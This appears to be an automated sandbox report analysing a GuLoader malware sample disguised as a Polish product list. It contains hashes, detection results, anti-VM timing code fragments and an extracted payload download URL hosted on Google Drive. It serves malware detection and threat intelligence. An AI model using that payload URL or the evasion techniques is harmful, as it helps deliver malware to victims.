Analysis Report Lista produkt#U00f3w.exe

Overview

General Information

Sample Name: Lista produkt#U00f3w.exe
Analysis ID: 411100
MD5: c7f305d2e4f5e91e8118ac32ec796b0c
SHA1: c477a3d238b96c2a58e77bb7c818775e23f7d656
SHA256: 0d28b94959edb70309a2754a83f2c9230b3176618ab571995d81955751ca2dbe

Detection

GuLoader
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Found potential dummy code loops (likely to delay analysis)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w7x64
  • Lista produkt#U00f3w.exe (PID: 1492 cmdline: 'C:\Users\user\Desktop\Lista produkt#U00f3w.exe' MD5: C7F305D2E4F5E91E8118AC32EC796B0C)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=17FenSUBd1a7PqzhRX-elu4bxZvs0LF9Y"}

Yara Overview

Memory Dumps

Source: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    AV Detection:

    Found malware configuration
    Source: Lista produkt#U00f3w.exe, Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=17FenSUBd1a7PqzhRX-elu4bxZvs0LF9Y"}
    Multi AV Scanner detection for submitted file
    Source: Lista produkt#U00f3w.exe, Virustotal: Detection: 34%
    Source: Lista produkt#U00f3w.exe, ReversingLabs: Detection: 17%
    Source: Lista produkt#U00f3w.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

    Networking:

    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractor, URLs: https://drive.google.com/uc?export=download&id=17FenSUBd1a7PqzhRX-elu4bxZvs0LF9Y
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmp, String found in binary or memory: http://investor.msn.com
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmp, String found in binary or memory: http://investor.msn.com/
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmp, String found in binary or memory: http://localizability/practices/XML.asp
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmp, String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmp, String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmp, String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmp, String found in binary or memory: http://www.hotmail.com/oe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmp, String found in binary or memory: http://www.icra.org/vocabulary/.
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmp, String found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmp, String found in binary or memory: http://www.windows.com/pctv.
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe, Process Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe, Memory allocated: 76E20000 page execute and read and write
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe, Memory allocated: 76D20000 page execute and read and write
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe, Code function: 0_2_01D733E1 NtProtectVirtualMemory,0_2_01D733E1
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe, Code function: 0_2_01D71B3F NtAllocateVirtualMemory,0_2_01D71B3F
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe, Code function: 0_2_00407206 0_2_00407206
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe, Code function: 0_2_00407246 0_2_00407246
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe, Code function: 0_2_0040176F 0_2_0040176F
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe, Code function: 0_2_00401580 0_2_00401580
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe, Code function: 0_2_004017BC 0_2_004017BC
    Source: Lista produkt#U00f3w.exe, 00000000.00000000.2086108427.0000000000414000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenameFarveskrmene.exe vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3167446836.0000000001E58000.00000004.00000040.sdmp, Binary or memory string: OriginalFilenameFarveskrmene.exeFE2X vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exeBinary or memory string: OriginalFilenameFarveskrmene.exe vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal80.troj.evad.winEXE@1/0@0/0
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeFile created: C:\Users\user\AppData\Local\Temp\~DF9757055F2834F01E.TMPJump to behavior
    Source: Lista produkt#U00f3w.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Lista produkt#U00f3w.exeVirustotal: Detection: 34%
    Source: Lista produkt#U00f3w.exeReversingLabs: Detection: 17%

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara match File source: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_00406613 push edx; ret 0_2_00406614
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_00405A15 push esp; ret 0_2_00405A20
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_00405889 push eax; ret 0_2_0040588C
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_0040576B push edi; retf 0_2_004057A0
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_00404B1B push esp; retn 0000h 0_2_00404B1D
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_0040459E pushfd ; ret 0_2_004045A0
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D71B3F pushfd ; iretd 0_2_01D71CAC
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D71CA1 pushfd ; iretd 0_2_01D71CAC
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    Contains functionality to detect hardware virtualization (CPUID execution measurement)
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D70D16 0_2_01D70D16
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D70511 0_2_01D70511
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D71301 0_2_01D71301
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D70C5E 0_2_01D70C5E
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe RDTSC instruction interceptor: First address: 0000000001D71972 second address: 0000000001D71972 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F23ACD81D8Ah 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 cmp bx, ax 0x00000023 dec ecx 0x00000024 cmp dh, ah 0x00000026 cmp ecx, 00000000h 0x00000029 jne 00007F23ACD81D6Ah 0x0000002b push ecx 0x0000002c cmp bl, al 0x0000002e cmp bl, cl 0x00000030 call 00007F23ACD81D9Fh 0x00000035 call 00007F23ACD81D9Ah 0x0000003a lfence 0x0000003d mov edx, dword ptr [7FFE0014h] 0x00000043 lfence 0x00000046 ret 0x00000047 mov esi, edx 0x00000049 pushad 0x0000004a rdtsc
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D707C4 rdtsc 0_2_01D707C4
    Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

    Anti Debugging:

    Found potential dummy code loops (likely to delay analysis)
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Process Stats: CPU usage > 90% for more than 60s
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D707C4 rdtsc 0_2_01D707C4
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D72B82 mov eax, dword ptr fs:[00000030h] 0_2_01D72B82
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D72D69 mov eax, dword ptr fs:[00000030h] 0_2_01D72D69
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D70D16 mov eax, dword ptr fs:[00000030h] 0_2_01D70D16
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D7111A mov eax, dword ptr fs:[00000030h] 0_2_01D7111A
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D718E2 mov eax, dword ptr fs:[00000030h] 0_2_01D718E2
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D730ED mov eax, dword ptr fs:[00000030h] 0_2_01D730ED
    Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3167403263.00000000008E0000.00000002.00000001.sdmp Binary or memory string: Program Manager
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3167403263.00000000008E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3167403263.00000000008E0000.00000002.00000001.sdmp Binary or memory string: !Progman
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Code function: 0_2_01D71B3F cpuid 0_2_01D71B3F
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 1 | Virtualization/Sandbox Evasion 11 | OS Credential Dumping | Security Software Discovery 31 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 1 | LSASS Memory | Virtualization/Sandbox Evasion 11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 1 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Information Discovery 212 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    Lista produkt#U00f3w.exe | 34% | Virustotal |
    Lista produkt#U00f3w.exe | 17% | ReversingLabs | Win32.Trojan.Vebzenpak

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmp | false | | high
    http://www.windows.com/pctv. | Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmp | false | | high
    http://investor.msn.com | Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmp | false | | high
    http://www.msnbc.com/news/ticker.txt | Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmp | false | | high
    http://www.icra.org/vocabulary/. | Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true | Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.hotmail.com/oe | Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmp | false | | high
    http://investor.msn.com/ | Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmp | false | | high

                Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox Version:32.0.0 Black Diamond
                Analysis ID:411100
                Start date:11.05.2021
                Start time:16:11:34
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 52s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:Lista produkt#U00f3w.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:2
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal80.troj.evad.winEXE@1/0@0/0
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 30.8% (good quality ratio 15.9%)
                • Quality average: 28.9%
                • Quality standard deviation: 34.1%
                HCA Information:
                • Successful, ratio: 53%
                • Number of executed functions: 20
                • Number of non-executed functions: 20
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):5.711108381776406
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.15%
                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:Lista produkt#U00f3w.exe
                File size:81920
                MD5:c7f305d2e4f5e91e8118ac32ec796b0c
                SHA1:c477a3d238b96c2a58e77bb7c818775e23f7d656
                SHA256:0d28b94959edb70309a2754a83f2c9230b3176618ab571995d81955751ca2dbe
                SHA512:6eebcaff0963b5a69f574ceb0eb11f07ac1e6a195476c32b863e026f825f563e6b2406f7e6f34cc2ade6515cb14980e2be471a010fc8c8cf8727faa4f1421b56
                SSDEEP:1536:cDMp+5asYexpjWzziwuVlCqRryDqRZkD:cV57+iwuV9RZk
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......`.....................0............... ....@................

                File Icon

                Icon Hash:b09298b8cc8a19c6

                Static PE Info

                General

                Entrypoint:0x4013f0
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                DLL Characteristics:
                Time Stamp:0x6099DDA9 [Tue May 11 01:28:09 2021 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:ec8e962978786706cf0189109090c85e

                Entrypoint Preview

                Instruction
                push 00401F34h
                call 00007F23AC9F8F63h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                xor byte ptr [eax], al
                add byte ptr [eax], al
                inc eax
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [edx+ecx*2-47h], cl
                aas
                mov byte ptr [ebx+0Bh], dh
                inc edi
                mov eax, 8AB5048Eh
                les ecx, fword ptr [edx+09h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add dword ptr [eax], eax
                add byte ptr [eax], al
                add byte ptr [eax], al
                call 00007F23F8A29D04h
                push ebp
                dec ebp
                dec ecx
                dec esi
                dec ecx
                inc esi
                dec ecx
                inc ebx
                inc ebp
                dec esi
                push esp
                add byte ptr [eax], cl
                inc ecx
                add byte ptr [eax], al
                add byte ptr [eax], al
                add bh, bh
                int3
                xor dword ptr [eax], eax
                push es
                into
                sbb bh, byte ptr [esi]
                or esp, dword ptr [eax+56B54785h]
                jnp 00007F23AC9F8FD3h
                or eax, dword ptr [edi+33h]
                push ebp
                jc 00007F23AC9F8F35h
                sub dword ptr [esi-6Eh], edx
                xchg byte ptr [edi+eax*2], dh
                xchg dword ptr [ebp-3B91C6C1h], edx
                push ebp
                pop eax
                cmp cl, byte ptr [edi-53h]
                xor ebx, dword ptr [ecx-48EE309Ah]
                or al, 00h
                stosb
                add byte ptr [eax-2Dh], ah
                xchg eax, ebx
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                cmp byte ptr [edx], cl
                add byte ptr [eax], al
                and al, 09h
                add byte ptr [eax], al
                add byte ptr [edi], al
                add byte ptr [edx+65h], al
                arpl word ptr [ebp+72h], si
                jnc 00007F23AC9F8FD7h
                add byte ptr [47001201h], cl
                jc 00007F23AC9F8FE7h
                jo 00007F23AC9F8FE2h
                jnc 00007F23AC9F8FD4h

                Data Directories

                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x111d4 | 0x28 | .text
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0xc1c | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x158 | .text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                Sections

                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0x107d4 | 0x11000 | False | 0.422291475184 | data | 6.18941304283 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .data | 0x12000 | 0x11f4 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .rsrc | 0x14000 | 0xc1c | 0x1000 | False | 0.291015625 | data | 3.0223027499 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                Name | RVA | Size | Type | Language | Country
                RT_ICON | 0x14374 | 0x8a8 | data | |
                RT_GROUP_ICON | 0x14360 | 0x14 | data | |
                RT_VERSION | 0x140f0 | 0x270 | data | Chinese | Taiwan

                Imports

                DLL | Import
                MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaVarForInit, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRecUniToAnsi, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, __vbaVarCopy, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, __vbaVarForNext, _CIexp, __vbaFreeObj, __vbaFreeStr

                Version Infos

                Description | Data
                Translation | 0x0404 0x04b0
                InternalName | Farveskrmene
                FileVersion | 1.00
                CompanyName | Asso Filler
                ProductName | Asso Filler
                ProductVersion | 1.00
                FileDescription | Asso Filler
                OriginalFilename | Farveskrmene.exe

                Possible Origin

                Language of compilation system | Country where language is spoken
                Chinese | Taiwan

                Network Behavior

                No network behavior found

                System Behavior

                General

                Start time:16:12:40
                Start date:11/05/2021
                Path:C:\Users\user\Desktop\Lista produkt#U00f3w.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\Lista produkt#U00f3w.exe'
                Imagebase:0x400000
                File size:81920 bytes
                MD5 hash:C7F305D2E4F5E91E8118AC32EC796B0C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                Disassembly

                Code Analysis

                  Execution Graph

                  Execution Coverage:3.4%
                  Dynamic/Decrypted Code Coverage:72.3%
                  Signature Coverage:21.2%
                  Total number of Nodes:788
                  Total number of Limit Nodes:10

3356->3326 3358 1d71b3f 2 API calls 3357->3358 3359 1d70bfc 3358->3359 3364 1d71d6e 3359->3364 3365 1d7240d 3364->3365 3368 1d71d73 3365->3368 3369 1d71b3f 2 API calls 3368->3369 3370 1d71d7a 3369->3370 3371 1d72bec GetPEB 3370->3371 3372 1d71d8f 3371->3372 3373 1d72bec GetPEB 3372->3373 3374 1d71daf 3373->3374 3375 1d72bec GetPEB 3374->3375 3376 1d71dc7 3375->3376 3377 1d72bec GetPEB 3376->3377 3378 1d71de1 3377->3378 3379 1d72bec GetPEB 3378->3379 3381 1d71dfb 3379->3381 3382 1d723c9 3381->3382 3383 1d71e23 3381->3383 3384 1d71b3f 2 API calls 3383->3384 3385 1d71e2a 3384->3385 3386 1d71fe9 3385->3386 3387 1d738df 8 API calls 3385->3387 3388 1d738df 8 API calls 3386->3388 3391 1d71e7d 3387->3391 3389 1d71ffc 3388->3389 3389->3381 3390 1d738df 8 API calls 3390->3391 3391->3386 3391->3390 3392 1d71f73 3391->3392 3394 1d703d8 3391->3394 3393 1d738df 8 API calls 3392->3393 3396 1d71f8a 3393->3396 3395 1d703ad 8 API calls 3394->3395 3397 1d703dd 3395->3397 3396->3394 3398 1d71fa2 3396->3398 3397->3381 3399 1d738df 8 API calls 3398->3399 3400 1d71fb4 3399->3400 3400->3381 3402 1d72bec GetPEB 3401->3402 3409 1d70d23 3402->3409 3403 1d71301 3404 1d730ed 3 API calls 3403->3404 3405 1d7132a 3404->3405 3406 1d738df 7 API calls 3405->3406 3410 1d713ac 3406->3410 3407 1d716e3 3408 1d738df 7 API calls 3407->3408 3411 1d716fb 3408->3411 3409->3403 3412 1d738df 7 API calls 3409->3412 3431 1d70e74 3409->3431 3410->3407 3415 1d738df 7 API calls 3410->3415 3413 1d738df 7 API calls 3411->3413 3412->3409 3414 1d7170e 3413->3414 3416 1d738df 7 API calls 3414->3416 3417 1d714bc 3415->3417 3418 1d71721 3416->3418 3417->3407 3420 1d738df 7 API calls 3417->3420 3419 1d738df 7 API calls 3418->3419 3422 1d71738 3419->3422 3421 1d71507 3420->3421 3421->3407 3423 1d738df 7 API calls 3421->3423 3422->3211 3428 1d71571 3423->3428 3424 1d71010 3425 1d71017 GetPEB 3424->3425 3427 1d7103c 3425->3427 3426 1d710ff 3444 1d7111a 3426->3444 3427->3426 3430 1d738df 7 API calls 3427->3430 3432 1d710cc 
